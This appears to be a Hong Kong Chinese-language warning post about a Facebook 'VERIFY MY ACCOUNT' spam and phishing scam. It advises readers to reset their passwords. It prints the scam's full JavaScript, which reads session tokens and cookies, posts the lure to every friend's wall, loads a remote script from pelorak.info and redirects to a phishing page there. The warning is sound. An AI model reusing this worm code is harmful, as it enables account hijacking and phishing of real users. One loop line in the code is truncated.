你或你朋友的 Facebook 上可能會發現不少“Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process…”的訊息。切密相信! 不要按下去,他絕對不是核實你的 FB 戶口資料,實情是個 SPAM + 釣魚 程式。如果你曾經按下並完成登入,不要猶豫!立即重新設定密碼,你的密碼可能已被盜走!
Facebook 更改密碼頁:
https://www.facebook.com/editaccount.php?ref=mb&drop
其實這是一段 Javascript 程式碼,用戶按下 “==VERIFY MY ACCOUNT==” 後就會自動貼到你所有朋友的 Facebook上,然後再彈出提示信息 ” Verification Failed. Click ‘OK’ and follow the steps to prevent your account from being deleted.”假若你 Click OK 就會去到一個 http://pelorak.info/verifty.php?js 網頁,幸好這個網站暫時被鎖,未對用戶做成進一步傷害。如果你見到你的 Wall 有這些訊息,請立即刪除,不要按下任何連結,請各位按讚好或分享此新聞,以免朋友中伏,感謝。
以下是該 JavaScript 的 Code :
var message = “Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process…”;
var jsText = “javascript:(function(){_ccscr=document.createElement(‘script’);_ccscr.type=’text/javascript’;_ccscr.src=’http://pelorak.info/verify.js?’+(Math.random());document.getElementsByTagName(‘head’)[0].appendChild(_ccscr);})();”;
var myText = “==>[VERIFY MY ACCOUNT]<==”;
var post_form_id = document.getElementsByName(‘post_form_id’)[0].value;
var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf.open(“GET”,”/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=” + uid + “&”+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
data = eval(‘(‘ + gf.responseText.substr(9) + ‘)’);
if(data.error){ }else{
friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
}
}
for(var i=0; i var httpwp = new XMLHttpRequest();
var urlwp = “http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1”;
var paramswp = “&__d=1&app_id=6628568379&extern=0&” +
“&post_form_id=” + post_form_id +
“&fb_dtsg=” + fb_dtsg +
“&feed_info[action_links][0][href]=” + encodeURIComponent(jsText) +
“&feed_info[action_links][0][text]=” + encodeURIComponent(myText) +
“&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=” + friends[i].uid +
“&user_message=” + message;
httpwp.open(“POST”, urlwp, true);
httpwp.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);
httpwp.setRequestHeader(“Content-length”, paramswp.length);
httpwp.setRequestHeader(“Connection”, “keep-alive”);
httpwp.onreadystatechange = function(){
if (httpwp.readyState == 4 && httpwp.status == 200){
}
}
httpwp.send(paramswp);
}
alert(“Verification Failed. Click ‘OK’ and follow the steps to prevent your account from being deleted.”);
document.location = “http://pelorak.info/verify.php?js”;